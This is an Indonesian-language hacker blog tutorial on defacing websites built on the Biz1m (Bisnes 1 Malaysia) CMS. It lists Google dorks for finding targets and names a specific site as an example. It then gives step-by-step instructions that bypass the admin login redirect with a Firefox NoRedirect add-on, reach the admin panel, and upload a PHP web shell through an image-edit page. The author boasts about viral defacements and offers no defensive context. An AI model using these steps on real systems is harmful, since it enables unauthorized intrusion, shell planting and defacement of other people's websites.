Deface CMS Biz1m (Bisnes 1 Malaysia) Upload Shell

Web Malaysia Yang Ane Deface
Yapp... ente pada pasti tau lah SS diatas itu apaan. Ente gak tau?? DASAR NDESOOO :V
Wkakaka. Karna faktor ketamvanan dan keberuntungan hasil deface ane jadi Viral coyy *Sombong:V
Oke. langsung aja.

Disini ane deface pake method Bypass Admin Noredirrect. Lalu Upload Shell.
Alat perang yang harus ente siapin yaitu:
1. Mozilla Firefox ( Pake versi yg gak lawas aja )
2. Addons Noredirrect ( Comot disini Nzeng  )
3. Otak :V

Oke langsung cari aja Targetnya pake dork.
Karna ana baik, jadi ane kasih dah Dork kebanggaan ane :V

Intitle:"::Peluang buat bisnes"
Inurl:/?buka=admin
Inurl:/?buka=testimoni
Inurl:/?buka=berita

Silahkan dikembangkan ndiri :P

Oke langsung ke peroses nya aje :V
1. Dorking pake salah satu dork diatas.

Langkah Pertama 1. Dorking

2. Pilih salah satu target.
Contoh disini gua pake target http://promosiauto.com

3. Lalu masukan Exploit admin login /admin-cp/logadmin.php di belakang url target
Misal ane pilih http://promosiauto.com trus ane tambahin exploit 
Hasilnya akan menjadi http://promosiauto.com/admin-cp/logadmin.php

4. Sekarang masuk ke mozilla firefox. Akses web yang sudah diberi Exploit tadi dengan Mozilla Firefox :V

5. Kalo udah sekarang klik tombol alt. lalu lihat diatas (toolbar firefox) lalu pilih Tools > Noredirect

6. Di Noredirect kalian klik Add new. Nah nanti akan muncul kotak :V
Masukin target kalian tadi di kotak tersebut dengan menyertakan tanda "^" di depan target.
Contoh:" ^http://promosiauto.com/admin-cp/logadmin.php" (tanpa petik)

7. Sekarang klik Ok. Trus tinggal akses ke dashboard adminnya aja.
Silahkan akses Web tadi dengan menambahkan exploit baru. Yaitu admin-cp.php
Contoh: http://promosiauto.com/admin-cp.php

8. Tinggal upload Shell deh! Caranya kita exploit lagi dengan menambahkan
"admin-cp.php?buka=iklanvvip"
Contoh:http://promosiauto.com/admin-cp.php?buka=iklanvvip

9. Tinggal klik edit gambar, jedar jeder deh!
Akses Shell: www.target.com/images/shellkamu.php

Video bisa dilihat di: Disini :V
Judulnya: Deface Website New Method 2017 #SoraCyberTeam
Cari sendiri ye! Usaha! HAHAHAHA :"V




Jangan lupa diSubscribe :V


Instagram: @kasuganosora09_
Youtube  : Cy#b3r00T
BBMC    :C00452B05



Tags:

Updated: